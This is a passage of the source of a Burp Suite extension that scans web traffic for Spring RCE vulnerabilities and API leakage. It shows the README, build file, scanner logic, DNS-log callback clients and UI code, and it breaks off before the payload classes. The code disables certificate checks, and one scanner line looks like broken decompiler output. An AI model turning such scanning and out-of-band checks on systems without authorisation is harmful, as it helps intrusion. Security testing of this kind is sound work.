├── README.md └── SpingVulScan-1.0 ├── pom.xml └── src └── main └── java └── burp ├── BurpExtender.java ├── DnsLog ├── DnsLogInterface.java ├── ParamsHelpers.java └── Platform │ ├── BurpCollaborator.java │ └── DnsLogCn.java ├── Scan └── Scanner.java ├── SpringIssue.java ├── UI ├── Tags.java └── tabs │ ├── ScanResultsUI.java │ └── SettingUI.java ├── auxiliary ├── CheckIsSpring.java ├── ReadFile.java └── YamlReader.java └── payload ├── Payload.java ├── RCE ├── APIunauthorized.java ├── CloudFramework.java ├── CloudFuncionSpEl.java ├── CloudGatewaySpEl.java ├── DataCommons.java ├── MessagingRCE.java ├── SecurityOAuth2RCE.java └── WebFlowRCE.java └── ScanPayload.java /README.md: -------------------------------------------------------------------------------- 1 | # SpringVulScan 2 | 3 | ##### 喜欢的可以给作者一个start 4 | 5 | ## SpringVulScan--burpsuite插件 6 | ### 更新 7 | #### 1.1 8 | 1、添加自定义根路径扫描。 9 | 2、右键可send to SpringVulScan,自定义字典等。 10 | 3、优化检测思路。 11 | 4、自定义选择不仅可以用来检测路由泄露,也可以用来爆破目录。 12 | 5、直接下载releases的SpringVulScan-1.1.zip解压即可。 13 | ## 写在前边 14 | 15 | 这是我开发的第一款burpsuite插件,本着的目标是为了更好更方便的去检测一些可能存在Spring漏洞的地方。第一次开发它也是遇到了许许多多的问题和困难,从收集互联网关于burpsuite插件开发资料(API,说明文档),到现在基本功能已经能够实现,前后经历了半个月左右的时间(中间也是掺杂了一些其他的琐事)。不过好在现在已将完成了它!!想着自己有时间搞一个burpsuite插件开发的思路(API的使用),内容文档我也会放到GitHub上,以后有时间继续维护它!!下边对其功能和使用方法进行介绍。 16 | 17 | ## 功能介绍 18 | 19 | **界面** 20 | 21 | ![img](https://cdn.nlark.com/yuque/0/2022/png/21739648/1655642522435-9442e040-9680-4a09-ae0b-c691e02ae3fb.png) 22 | 23 | 长相也就一般般,GUI也是搞了一阵子。 24 | 25 | | 功能点 | 介绍 | 26 | | -------- | ------------------------------------------------------------ | 27 | | 基础设置 | 无话可说 | 28 | | 检测方式 | 回显和回连,无话可说。一般情况下基本上全开就行了。 | 29 | | 扫描类型 | 同一站点仅检测一次:默认开启,开启后,同一个站点只进行一次检测,不会因为url的变化而再次检测。过滤检测Spring框架:默认关闭,开启后,自动根据Spring的特性,"whitelabel error page",进行过滤性检测。而不会对其他流量进行再一次扫描。 | 30 | | 编号检测 | 可指定漏洞类型进行检测。 | 31 | | 回连平台 | 目前仅仅支持burpcollaborator,DnsLog.cn。其他平台功能暂未完善。若目标没做流量限制,建议使用burpcollaborator,扫描速度快且结果准确。 | 32 | 33 | ​ **文件目录** 34 | 35 | ![img](https://cdn.nlark.com/yuque/0/2022/png/21739648/1655643243635-61ed581d-c43e-4b68-8ea8-e78f9e583987.png) 36 | 37 | ```bash 38 | conifg 39 | ------apiRoute.txt 泄露路由检测,可自定义。 40 | ------config.yml CVE漏洞检测payload,部分payload不建议自定义。 41 | SpringVulScan-1.0.jar 42 | ``` 43 | 44 | ​ **检测效果** 45 | 46 | ![img](https://cdn.nlark.com/yuque/0/2022/png/21739648/1655643585846-c399a4fb-ebf4-4b8d-a37b-6a637ed5c179.png) 47 | 48 | 这个面板不是很方便,然后就添加到了仪表盘。所以直接在仪表盘查看是否存在漏洞即可。 49 | 50 | ![img](https://cdn.nlark.com/yuque/0/2022/png/21739648/1655643921940-656462a1-2ab5-496c-bf2d-c527a64df969.png) 51 | 52 | 像*CVE-2022-22965*这种可直接进行利用的,而且便于检测,所以直接报出高危红色即可,像api泄露这种检测起来不是很容易的就在Low和Medium面板。当然Medium面板的概率大于Low面板,相较于更准确些。 53 | 54 | ![img](https://cdn.nlark.com/yuque/0/2022/png/21739648/1655643953534-425a80ad-7c4a-43a6-82fe-61000f4f4f74.png) 55 | 56 | ![img](https://cdn.nlark.com/yuque/0/2022/png/21739648/1655643972721-000088b8-f73a-4c25-8c2e-28a3c4097357.png) 57 | 58 | ## 总结 59 | 60 | 基本的注意点和用法就这么些,初次开发第一个工具,肯定存在一些未知的问题,还请直接提交issue。 61 | 62 | ## 参考 63 | 64 | https://portswigger.net/burp/extender/api/burp/package-summary.html 65 | 66 | https://xz.aliyun.com/t/7065 67 | 68 | 以及一些其他的开源插件 69 | -------------------------------------------------------------------------------- /SpingVulScan-1.0/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 4.0.0 6 | 7 | org.example 8 | SpingVulScan 9 | 1.0-SNAPSHOT 10 | 11 | 12 | 8 13 | 8 14 | 15 | 16 | 17 | 18 | net.portswigger.burp.extender 19 | burp-extender-api 20 | 2.3 21 | 22 | 23 | com.github.adedayo.intellij.sdk 24 | forms_rt 25 | 142.1 26 | 27 | 28 | com.github.kevinsawicki 29 | http-request 30 | 6.0 31 | 32 | 33 | org.yaml 34 | snakeyaml 35 | 1.23 36 | 37 | 38 | com.google.guava 39 | guava 40 | 20.0 41 | 42 | 43 | 44 | 45 | 46 | 47 | org.apache.maven.plugins 48 | maven-assembly-plugin 49 | 2.2-beta-5 50 | 51 | 52 | 53 | com.yj.TCPClient.upload.App 54 | 55 | 56 | 57 | jar-with-dependencies 58 | 59 | 60 | 61 | 62 | 63 | 64 | make-assembly 65 | package 66 | 67 | single 68 | 69 | 70 | 71 | 72 | 73 | 74 | -------------------------------------------------------------------------------- /SpingVulScan-1.0/src/main/java/burp/BurpExtender.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | import java.io.PrintWriter; 4 | 5 | import burp.UI.Tags; 6 | import burp.Scan.Scanner; 7 | 8 | public class BurpExtender implements IBurpExtender 9 | { 10 | private final String name = "SpringVulScan"; 11 | private final String version = "1.0"; 12 | 13 | public IBurpExtenderCallbacks callbacks; 14 | public IExtensionHelpers helpers; 15 | public PrintWriter stdout; 16 | public PrintWriter stderr; 17 | public Tags tags; 18 | private Scanner scanner;//Scanner 实现了IScannerCheck接口 19 | 20 | 21 | @Override 22 | public void registerExtenderCallbacks(IBurpExtenderCallbacks callbacks) { 23 | this.callbacks = callbacks; 24 | // 设置拓展名称 25 | this.callbacks.setExtensionName(name); 26 | //该方法用于获得一个 IExtensionHelpers目的, 扩展程序可以使用它来执行许多有用的任务。 27 | this.helpers = this.callbacks.getHelpers(); 28 | // 获取输入输出流 29 | this.stderr = new PrintWriter(this.callbacks.getStderr(), true); 30 | this.stdout = new PrintWriter(this.callbacks.getStdout(), true); 31 | // 添加tag标签到ui 32 | this.tags = new Tags(callbacks, this.name); 33 | 34 | // 初始化 scanner 35 | this.scanner = new Scanner(this); 36 | 37 | // 注册 Scanner 38 | this.callbacks.registerScannerCheck(this.scanner); 39 | 40 | //打印插件信息 41 | this.stdout.println(this.extenderInfo()); 42 | } 43 | 44 | 45 | public String extenderInfo(){ 46 | String info = "===========================\n" + 47 | "[+] load successful! \n" + 48 | "[+] SpringVulScan V1.0 \n" + 49 | "[+] code by Tptfb11 \n" + 50 | "[+] GitHUub: https://github.com/tpt11fb \n"; 51 | String payload = "目前支持:\n" + 52 | "[+] Spring Core RCE (CVE-2022-22965)\n" + 53 | "[+] Spring Cloud Function SpEL RCE (CVE-2022-22963)\n" + 54 | "[+] Spring Cloud GateWay SPEL RCE (CVE-2022-22947)\n" + 55 | "[+] Spring Security OAuth2 RCE (CVE-2016-4977)\n" + 56 | "[+] API 未授权、泄露\n" + 57 | "===========================\n"; 58 | return info + payload; 59 | } 60 | } -------------------------------------------------------------------------------- /SpingVulScan-1.0/src/main/java/burp/DnsLog/DnsLogInterface.java: -------------------------------------------------------------------------------- 1 | package burp.DnsLog; 2 | 3 | public interface DnsLogInterface { 4 | String getTempDomain(); 5 | 6 | String getBodyContent() throws InterruptedException; 7 | 8 | boolean checkResult() throws InterruptedException; 9 | 10 | String outExport(); 11 | 12 | void export(); 13 | } 14 | -------------------------------------------------------------------------------- /SpingVulScan-1.0/src/main/java/burp/DnsLog/ParamsHelpers.java: -------------------------------------------------------------------------------- 1 | package burp.DnsLog; 2 | 3 | public class ParamsHelpers { 4 | public static String getParam(String d, String paramName) { 5 | if (d != null && d.length() != 0) { 6 | String value = "test=test;" + d; 7 | int length = value.length(); 8 | int start = value.indexOf(59) + 1; 9 | if (start != 0 && start != length) { 10 | int end = value.indexOf(59, start); 11 | if (end == -1) { 12 | end = length; 13 | } 14 | 15 | while(start < end) { 16 | int nameEnd = value.indexOf(61, start); 17 | if (nameEnd != -1 && nameEnd < end && paramName.equals(value.substring(start, nameEnd).trim())) { 18 | String paramValue = value.substring(nameEnd + 1, end).trim(); 19 | int valueLength = paramValue.length(); 20 | if (valueLength != 0) { 21 | if (valueLength > 2 && '"' == paramValue.charAt(0) && '"' == paramValue.charAt(valueLength - 1)) { 22 | return paramValue.substring(1, valueLength - 1); 23 | } 24 | 25 | return paramValue; 26 | } 27 | } 28 | 29 | start = end + 1; 30 | end = value.indexOf(59, start); 31 | if (end == -1) { 32 | end = length; 33 | } 34 | } 35 | 36 | return null; 37 | } else { 38 | return null; 39 | } 40 | } else { 41 | return null; 42 | } 43 | } 44 | } 45 | -------------------------------------------------------------------------------- /SpingVulScan-1.0/src/main/java/burp/DnsLog/Platform/BurpCollaborator.java: -------------------------------------------------------------------------------- 1 | package burp.DnsLog.Platform; 2 | 3 | import burp.IBurpCollaboratorClientContext; 4 | import burp.IBurpCollaboratorInteraction; 5 | import burp.IBurpExtenderCallbacks; 6 | import burp.IExtensionHelpers; 7 | import burp.DnsLog.DnsLogInterface; 8 | import java.io.PrintWriter; 9 | import java.util.Iterator; 10 | import java.util.List; 11 | import java.util.Map; 12 | 13 | public class BurpCollaborator implements DnsLogInterface { 14 | private IBurpExtenderCallbacks callbacks; 15 | private IExtensionHelpers helpers; 16 | private IBurpCollaboratorClientContext burpCollaboratorClientContext; 17 | private String dnsLogName; 18 | private String tempDomain; 19 | private String dnslogContent = null; 20 | 21 | public BurpCollaborator(IBurpExtenderCallbacks callbacks) { 22 | this.callbacks = callbacks; 23 | this.helpers = callbacks.getHelpers(); 24 | this.dnsLogName = "http://burpcollaborator.net/"; 25 | this.burpCollaboratorClientContext = callbacks.createBurpCollaboratorClientContext(); 26 | this.init(); 27 | } 28 | 29 | public void init() { 30 | this.tempDomain = this.burpCollaboratorClientContext.generatePayload(true); 31 | if (this.tempDomain == null || this.tempDomain.length() <= 0) { 32 | throw new RuntimeException(String.format("请检查本机是否可使用burp自带的dnslog客户端,%s", this.dnsLogName)); 33 | } 34 | } 35 | 36 | public String getTempDomain() { 37 | return this.tempDomain; 38 | } 39 | 40 | public String getBodyContent() { 41 | List collaboratorInteractions = this.burpCollaboratorClientContext.fetchCollaboratorInteractionsFor(this.getTempDomain()); 42 | if (collaboratorInteractions != null && !collaboratorInteractions.isEmpty()) { 43 | Iterator iterator = collaboratorInteractions.iterator(); 44 | Map properties = ((IBurpCollaboratorInteraction)iterator.next()).getProperties(); 45 | if (properties.size() == 0) { 46 | return this.dnslogContent; 47 | } else { 48 | String content = null; 49 | 50 | String text; 51 | for(Iterator var5 = properties.keySet().iterator(); var5.hasNext(); content = content + text + " ") { 52 | String property = (String)var5.next(); 53 | text = (String)properties.get(property); 54 | if (property.equals("raw_query")) { 55 | text = new String(this.helpers.base64Decode(text)); 56 | } 57 | } 58 | 59 | this.dnslogContent = this.dnslogContent + content; 60 | return this.dnslogContent; 61 | } 62 | } else { 63 | return this.dnslogContent; 64 | } 65 | } 66 | 67 | public boolean checkResult() { 68 | return this.getBodyContent() != null; 69 | } 70 | 71 | public String outExport() { 72 | return String.format("BurpDnsLog Domain: %s", this.getTempDomain()); 73 | } 74 | 75 | public void export() { 76 | PrintWriter stdout = new PrintWriter(this.callbacks.getStdout(), true); 77 | stdout.println(""); 78 | stdout.println("===========BurpDnsLog扩展详情==========="); 79 | stdout.println(String.format("BurpDnsLog临时域名: %s", this.getTempDomain())); 80 | stdout.println("==================================="); 81 | stdout.println(""); 82 | } 83 | } 84 | -------------------------------------------------------------------------------- /SpingVulScan-1.0/src/main/java/burp/DnsLog/Platform/DnsLogCn.java: -------------------------------------------------------------------------------- 1 | package burp.DnsLog.Platform; 2 | 3 | import burp.BurpExtender; 4 | import burp.DnsLog.DnsLogInterface; 5 | import burp.DnsLog.ParamsHelpers; 6 | import com.github.kevinsawicki.http.HttpRequest; 7 | import java.io.PrintWriter; 8 | 9 | public class DnsLogCn implements DnsLogInterface { 10 | private BurpExtender burpExtender; 11 | private String dnslogDomainName; 12 | private String tempDomain; 13 | private String dnsLogCookieName; 14 | private String dnsLogCookieValue; 15 | 16 | public DnsLogCn(BurpExtender burpExtender) throws InterruptedException { 17 | this.burpExtender = burpExtender; 18 | this.dnslogDomainName = "http://www.dnslog.cn/"; 19 | this.init(); 20 | } 21 | 22 | public void init() throws InterruptedException { 23 | int i = 0; 24 | 25 | while(i < 3) { 26 | try { 27 | String url = this.dnslogDomainName + "/getdomain.php"; 28 | String userAgent = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"; 29 | HttpRequest request = HttpRequest.get((CharSequence)url); 30 | request.trustAllCerts(); 31 | request.trustAllHosts(); 32 | request.followRedirects(false); 33 | request.header("User-Agent", userAgent); 34 | request.header("Accept", "*/*"); 35 | request.readTimeout(3000); 36 | request.connectTimeout(3000); 37 | this.tempDomain = request.body(); 38 | String cookie = request.header("Set-Cookie"); 39 | String sessidKey = "PHPSESSID"; 40 | String sessidValue = ParamsHelpers.getParam(cookie, sessidKey); 41 | this.dnsLogCookieName = sessidKey; 42 | this.dnsLogCookieValue = sessidValue; 43 | break; 44 | } catch (RuntimeException var8) { 45 | this.burpExtender.stdout.println("尝试第" + i + "次请求DnsLogCn平台,失败!"); 46 | Thread.sleep(3000L); 47 | var8.printStackTrace(); 48 | ++i; 49 | } 50 | } 51 | 52 | } 53 | 54 | public String getTempDomain() { 55 | return this.tempDomain; 56 | } 57 | 58 | public String getBodyContent() throws InterruptedException { 59 | int i = 0; 60 | 61 | while(i < 3) { 62 | try { 63 | String url = this.dnslogDomainName + "/getrecords.php"; 64 | String userAgent = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"; 65 | HttpRequest request = HttpRequest.get((CharSequence)url); 66 | request.trustAllCerts(); 67 | request.trustAllHosts(); 68 | request.followRedirects(false); 69 | request.header("User-Agent", userAgent); 70 | request.header("Accept", "*/*"); 71 | request.header("Cookie", this.dnsLogCookieName + "=" + this.dnsLogCookieValue + ";"); 72 | request.readTimeout(30000); 73 | request.connectTimeout(30000); 74 | String body = request.body(); 75 | if (body.equals("[]")) { 76 | return null; 77 | } 78 | 79 | return body; 80 | } catch (Exception var6) { 81 | this.burpExtender.stdout.println("尝试第" + i + "次请求DnsLogCn平台,失败!"); 82 | Thread.sleep(3000L); 83 | var6.printStackTrace(); 84 | ++i; 85 | } 86 | } 87 | 88 | return null; 89 | } 90 | 91 | public boolean checkResult() throws InterruptedException { 92 | return this.getBodyContent() != null; 93 | } 94 | 95 | public String outExport() { 96 | String exp1 = String.format("dnsLog域名: %s", this.dnslogDomainName); 97 | String exp2 = String.format("dnsLog保存记录的api接口: %s", this.dnslogDomainName + "/getrecords.php"); 98 | String exp3 = String.format("cookie: %s=%s", this.dnsLogCookieName, this.dnsLogCookieValue); 99 | String exp4 = String.format("dnsLog临时域名: %s", this.getTempDomain()); 100 | return exp1 + "\n" + exp2 + "\n" + exp3 + "\n" + exp4; 101 | } 102 | 103 | public void export() { 104 | PrintWriter stdout = new PrintWriter(this.burpExtender.callbacks.getStdout(), true); 105 | stdout.println(""); 106 | stdout.println("===========dnsLog扩展详情==========="); 107 | stdout.println(String.format("dnsLog域名: %s", this.dnslogDomainName)); 108 | stdout.println(String.format("dnsLog保存记录的api接口: %s", this.dnslogDomainName + "/getrecords.php")); 109 | stdout.println(String.format("cookie: %s=%s", this.dnsLogCookieName, this.dnsLogCookieValue)); 110 | stdout.println(String.format("dnsLog临时域名: %s", this.getTempDomain())); 111 | stdout.println("==================================="); 112 | stdout.println(""); 113 | } 114 | } 115 | -------------------------------------------------------------------------------- /SpingVulScan-1.0/src/main/java/burp/Scan/Scanner.java: -------------------------------------------------------------------------------- 1 | package burp.Scan; 2 | 3 | import burp.BurpExtender; 4 | import burp.IExtensionHelpers; 5 | import burp.IHttpRequestResponse; 6 | import burp.IRequestInfo; 7 | import burp.IScanIssue; 8 | import burp.IScannerCheck; 9 | import burp.IScannerInsertionPoint; 10 | import burp.auxiliary.CheckIsSpring; 11 | import burp.payload.ScanPayload; 12 | import java.io.FileNotFoundException; 13 | import java.util.ArrayList; 14 | import java.util.HashSet; 15 | import java.util.List; 16 | import java.util.Set; 17 | 18 | public class Scanner implements IScannerCheck { 19 | private BurpExtender burpExtender; 20 | private IExtensionHelpers helpers; 21 | private String vulName; 22 | private CheckIsSpring checkIsSpring; 23 | private final Set Scan = new HashSet(); 24 | 25 | public Scanner(BurpExtender burpExtender) { 26 | this.burpExtender = burpExtender; 27 | this.helpers = this.burpExtender.helpers; 28 | this.checkIsSpring = new CheckIsSpring(this.burpExtender, this.helpers); 29 | } 30 | 31 | public List doPassiveScan(IHttpRequestResponse iHttpRequestResponse) { 32 | if (!this.burpExtender.tags.getSettingUi().isEnable()) { 33 | return null; 34 | } else { 35 | try { 36 | boolean filterSpring = this.burpExtender.tags.getSettingUi().isCheckSpring(); 37 | boolean checkOne = this.burpExtender.tags.getSettingUi().isCheckAll(); 38 | if (filterSpring && checkOne) { 39 | if (!this.checkRepeat(iHttpRequestResponse)) { 40 | if (!this.checkIsSpring.isSpring(iHttpRequestResponse, "", false) && !this.checkIsSpring.isSpring(iHttpRequestResponse, "", true) && !this.checkIsSpring.isSpring(iHttpRequestResponse, "oauth/authorize", false)) { 41 | this.burpExtender.stdout.println("未检测到Spring框架" + this.helpers.analyzeRequest(iHttpRequestResponse).getUrl()); 42 | return null; 43 | } else { 44 | return this.doScan(iHttpRequestResponse); 45 | } 46 | } else { 47 | this.burpExtender.stdout.println("流量已扫描"); 48 | return null; 49 | } 50 | } else if (!filterSpring && checkOne) { 51 | if (!this.checkRepeat(iHttpRequestResponse)) { 52 | return this.doScan(iHttpRequestResponse); 53 | } else { 54 | this.burpExtender.stdout.println("流量已扫描"); 55 | return null; 56 | } 57 | } else if (filterSpring) { 58 | if (!this.checkIsSpring.isSpring(iHttpRequestResponse, "", false) && !this.checkIsSpring.isSpring(iHttpRequestResponse, "", true) && !this.checkIsSpring.isSpring(iHttpRequestResponse, "oauth/authorize", false)) { 59 | this.burpExtender.stdout.println("未检测到Spring框架"); 60 | return null; 61 | } else { 62 | return this.doScan(iHttpRequestResponse); 63 | } 64 | } else { 65 | return this.doScan(iHttpRequestResponse); 66 | } 67 | } catch (InterruptedException | FileNotFoundException var4) { 68 | var4.printStackTrace(); 69 | this.burpExtender.stdout.println("插件启动失败!!"); 70 | return null; 71 | } 72 | } 73 | } 74 | 75 | public List doScan(IHttpRequestResponse iHttpRequestResponse) throws FileNotFoundException, InterruptedException { 76 | List issues = new ArrayList(); 77 | IRequestInfo requestInfo = this.helpers.analyzeRequest(iHttpRequestResponse); 78 | String url = String.valueOf(requestInfo.getUrl()); 79 | this.Scan.add(this.deelUrl(String.valueOf(requestInfo.getUrl()))); 80 | boolean isErrorCheck = this.burpExtender.tags.getSettingUi().isErrorCheck(); 81 | boolean isReverseCheck = this.burpExtender.tags.getSettingUi().isReverseCheck(); 82 | if (!isErrorCheck && !isReverseCheck) { 83 | this.burpExtender.stdout.println(String.format("[-] 检测失败: %s", url)); 84 | } else { 85 | this.burpExtender.stdout.println(String.format("[*] 加载完毕,正在测试: %s", url)); 86 | int id = this.burpExtender.tags.getScannerUi().add("ALL", requestInfo.getMethod(), url, String.valueOf(this.helpers.analyzeResponse(iHttpRequestResponse.getResponse()).getStatusCode()), "[-] 等待扫描结果,请稍后。。。。", iHttpRequestResponse); 87 | int isVul = true; 88 | ScanPayload scanPayload = new ScanPayload(this.burpExtender, this.helpers, iHttpRequestResponse); 89 | int isVul = scanPayload.getIsVul(); 90 | if (isVul == -1) { 91 | this.burpExtender.tags.getScannerUi().save(id, "ALL", requestInfo.getMethod(), String.valueOf(requestInfo.getUrl()), String.valueOf(this.helpers.analyzeResponse(iHttpRequestResponse.getResponse()).getStatusCode()), "[-] 不存在Spring漏洞", iHttpRequestResponse); 92 | } else { 93 | IHttpRequestResponse requestResponse; 94 | if (isVul == 0) { 95 | issues.add(scanPayload.getVulDetails()); 96 | this.vulName = scanPayload.getVulDetails().getIssueName(); 97 | requestResponse = scanPayload.getVulHttp(); 98 | this.burpExtender.tags.getScannerUi().save(id, "ALL", requestInfo.getMethod(), String.valueOf(requestInfo.getUrl()), String.valueOf(this.helpers.analyzeResponse(requestResponse.getResponse()).getStatusCode()), String.format("[?] %s 可能存在漏洞 (需要进一步手动验证)", this.vulName), requestResponse); 99 | } else if (isVul == 1) { 100 | issues.add(scanPayload.getVulDetails()); 101 | this.vulName = scanPayload.getVulDetails().getIssueName(); 102 | requestResponse = scanPayload.getVulHttp(); 103 | this.burpExtender.tags.getScannerUi().save(id, "ALL", requestInfo.getMethod(), String.valueOf(requestInfo.getUrl()), String.valueOf(this.helpers.analyzeResponse(requestResponse.getResponse()).getStatusCode()), String.format("[+] 存在 %s 漏洞! ! ", this.vulName), requestResponse); 104 | } else { 105 | this.burpExtender.stdout.println("未完成检测!"); 106 | } 107 | } 108 | } 109 | 110 | return issues; 111 | } 112 | 113 | public List doActiveScan(IHttpRequestResponse iHttpRequestResponse, IScannerInsertionPoint iScannerInsertionPoint) { 114 | return null; 115 | } 116 | 117 | public int consolidateDuplicateIssues(IScanIssue iScanIssue, IScanIssue iScanIssue1) { 118 | return 0; 119 | } 120 | 121 | public String deelUrl(String url) { 122 | return url.startsWith("https") ? url.substring(8, url.indexOf("/", 8)) : url.substring(7, url.indexOf("/", 8)); 123 | } 124 | 125 | public boolean checkRepeat(IHttpRequestResponse httpRequestResponse) { 126 | IRequestInfo requestInfo = this.helpers.analyzeRequest(httpRequestResponse); 127 | String url = this.deelUrl(String.valueOf(requestInfo.getUrl())); 128 | this.burpExtender.stdout.println("获取标识::" + url); 129 | this.burpExtender.stdout.println("已获取的标识::" + this.Scan); 130 | return this.Scan.contains(url); 131 | } 132 | } 133 | -------------------------------------------------------------------------------- /SpingVulScan-1.0/src/main/java/burp/SpringIssue.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | import java.net.URL; 4 | 5 | // 仪表盘显示 6 | public class SpringIssue implements IScanIssue { 7 | 8 | private URL url; 9 | private String issueName; 10 | private int issueType; 11 | private String severity; 12 | private String confidence; 13 | private String issueBackground; 14 | private String remediationBackground; 15 | private String issueDetail; 16 | private String remediationDetail; 17 | private IHttpRequestResponse[] httpMessages; 18 | private IHttpService httpService; 19 | 20 | public SpringIssue(URL url, String issueName, int issueType, String severity, String confidence, String issueBackground, String remediationBackground, String issueDetail, String remediationDetail, IHttpRequestResponse[] httpMessages, IHttpService httpService) { 21 | this.url = url; 22 | this.issueName = issueName; 23 | this.issueType = issueType; 24 | this.severity = severity; 25 | this.confidence = confidence; 26 | this.issueBackground = issueBackground; 27 | this.remediationBackground = remediationBackground; 28 | this.issueDetail = issueDetail; 29 | this.remediationDetail = remediationDetail; 30 | this.httpMessages = httpMessages; 31 | this.httpService = httpService; 32 | } 33 | 34 | @Override 35 | public URL getUrl() { 36 | return this.url; 37 | } 38 | 39 | @Override 40 | public String getIssueName() { 41 | return this.issueName; 42 | } 43 | 44 | @Override 45 | public int getIssueType() { 46 | return this.issueType; 47 | } 48 | 49 | @Override 50 | public String getSeverity() { 51 | return this.severity; 52 | } 53 | 54 | @Override 55 | public String getConfidence() { 56 | return this.confidence; 57 | } 58 | 59 | @Override 60 | public String getIssueBackground() { 61 | return this.issueBackground; 62 | } 63 | 64 | @Override 65 | public String getRemediationBackground() { 66 | return this.remediationBackground; 67 | } 68 | 69 | @Override 70 | public String getIssueDetail() { 71 | return this.issueDetail; 72 | } 73 | 74 | @Override 75 | public String getRemediationDetail() { 76 | return this.remediationDetail; 77 | } 78 | 79 | @Override 80 | public IHttpRequestResponse[] getHttpMessages() { 81 | return this.httpMessages; 82 | } 83 | 84 | @Override 85 | public IHttpService getHttpService() { 86 | return this.httpService; 87 | } 88 | } 89 | -------------------------------------------------------------------------------- /SpingVulScan-1.0/src/main/java/burp/UI/Tags.java: -------------------------------------------------------------------------------- 1 | package burp.UI; 2 | 3 | import burp.IBurpExtenderCallbacks; 4 | import burp.ITab; 5 | import burp.UI.tabs.ScanResultsUI; 6 | import burp.UI.tabs.SettingUI; 7 | import java.awt.Component; 8 | import javax.swing.JTabbedPane; 9 | 10 | public class Tags implements ITab { 11 | private final JTabbedPane tabs; 12 | private String name; 13 | private IBurpExtenderCallbacks callbacks; 14 | private SettingUI settingUI; 15 | private ScanResultsUI scanResultsUI; 16 | 17 | public Tags(IBurpExtenderCallbacks callbacks, String name) { 18 | this.callbacks = callbacks; 19 | this.name = name; 20 | this.tabs = new JTabbedPane(); 21 | this.settingUI = new SettingUI(callbacks, this.tabs); 22 | this.scanResultsUI = new ScanResultsUI(callbacks, this.tabs); 23 | this.callbacks.addSuiteTab(this); 24 | this.callbacks.customizeUiComponent(this.tabs); 25 | } 26 | 27 | public SettingUI getSettingUi() { 28 | return this.settingUI; 29 | } 30 | 31 | public ScanResultsUI getScannerUi() { 32 | return this.scanResultsUI; 33 | } 34 | 35 | public String getTabCaption() { 36 | return this.name; 37 | } 38 | 39 | public Component getUiComponent() { 40 | return this.tabs; 41 | } 42 | } 43 | -------------------------------------------------------------------------------- /SpingVulScan-1.0/src/main/java/burp/UI/tabs/ScanResultsUI.java: -------------------------------------------------------------------------------- 1 | package burp.UI.tabs; 2 | 3 | import burp.IBurpExtenderCallbacks; 4 | import burp.IHttpRequestResponse; 5 | import burp.IHttpService; 6 | import burp.IMessageEditor; 7 | import burp.IMessageEditorController; 8 | import java.awt.BorderLayout; 9 | import java.text.SimpleDateFormat; 10 | import java.util.ArrayList; 11 | import java.util.Date; 12 | import java.util.List; 13 | import javax.swing.JPanel; 14 | import javax.swing.JScrollPane; 15 | import javax.swing.JSplitPane; 16 | import javax.swing.JTabbedPane; 17 | import javax.swing.JTable; 18 | import javax.swing.table.AbstractTableModel; 19 | import javax.swing.table.TableModel; 20 | 21 | public class ScanResultsUI extends AbstractTableModel implements IMessageEditorController { 22 | private IBurpExtenderCallbacks callbacks; 23 | private IHttpRequestResponse currentHttp; 24 | private IMessageEditor messageRequest; 25 | private IMessageEditor messageResponse; 26 | private List tasks = new ArrayList(); 27 | private JTabbedPane tabs; 28 | private JPanel ScannerUI; 29 | private JSplitPane mainSplitPane; 30 | private JSplitPane httpSplitPane; 31 | private JScrollPane tablePane; 32 | private JTabbedPane requestPane; 33 | private JTabbedPane responsePane; 34 | 35 | public ScanResultsUI(IBurpExtenderCallbacks callbacks, JTabbedPane tabs) { 36 | this.callbacks = callbacks; 37 | this.tabs = tabs; 38 | this.initUI(); 39 | this.tabs.addTab("扫描流量", this.ScannerUI); 40 | } 41 | 42 | public void initUI() { 43 | this.ScannerUI = new JPanel(new BorderLayout()); 44 | this.mainSplitPane = new JSplitPane(0); 45 | this.httpSplitPane = new JSplitPane(1); 46 | this.httpSplitPane.setDividerLocation(0.5D); 47 | ScanResultsUI.Table table = new ScanResultsUI.Table(this); 48 | this.tablePane = new JScrollPane(table); 49 | this.requestPane = new JTabbedPane(); 50 | this.responsePane = new JTabbedPane(); 51 | this.messageRequest = this.callbacks.createMessageEditor(this, false); 52 | this.messageResponse = this.callbacks.createMessageEditor(this, false); 53 | this.requestPane.addTab("Resquest", this.messageRequest.getComponent()); 54 | this.responsePane.addTab("Response", this.messageResponse.getComponent()); 55 | this.httpSplitPane.add(this.requestPane); 56 | this.httpSplitPane.add(this.responsePane); 57 | this.mainSplitPane.add(this.tablePane); 58 | this.mainSplitPane.add(this.httpSplitPane); 59 | this.ScannerUI.add(this.mainSplitPane); 60 | } 61 | 62 | public IHttpService getHttpService() { 63 | return this.currentHttp.getHttpService(); 64 | } 65 | 66 | public byte[] getRequest() { 67 | return this.currentHttp.getRequest(); 68 | } 69 | 70 | public byte[] getResponse() { 71 | return this.currentHttp.getResponse(); 72 | } 73 | 74 | public int getRowCount() { 75 | return this.tasks.size(); 76 | } 77 | 78 | public int getColumnCount() { 79 | return 8; 80 | } 81 | 82 | public Object getValueAt(int rowIndex, int columnIndex) { 83 | ScanResultsUI.TableData data = (ScanResultsUI.TableData)this.tasks.get(rowIndex); 84 | switch(columnIndex) { 85 | case 0: 86 | return data.id; 87 | case 1: 88 | return data.checkMethod; 89 | case 2: 90 | return data.requestMethod; 91 | case 3: 92 | return data.url; 93 | case 4: 94 | return data.status_code; 95 | case 5: 96 | return data.issue; 97 | case 6: 98 | return data.startTime; 99 | case 7: 100 | return data.endTime; 101 | default: 102 | return null; 103 | } 104 | } 105 | 106 | public String getColumnName(int column) { 107 | switch(column) { 108 | case 0: 109 | return "#"; 110 | case 1: 111 | return "checkMethod"; 112 | case 2: 113 | return "requestMethod"; 114 | case 3: 115 | return "url"; 116 | case 4: 117 | return "status_code"; 118 | case 5: 119 | return "issue"; 120 | case 6: 121 | return "startTime"; 122 | case 7: 123 | return "endTime"; 124 | default: 125 | return null; 126 | } 127 | } 128 | 129 | public Class getColumnClass(int columnIndex) { 130 | return String.class; 131 | } 132 | 133 | public int add(String extensionMethod, String requestMethod, String url, String statusCode, String issue, IHttpRequestResponse requestResponse) { 134 | synchronized(this.tasks) { 135 | Date date = new Date(); 136 | 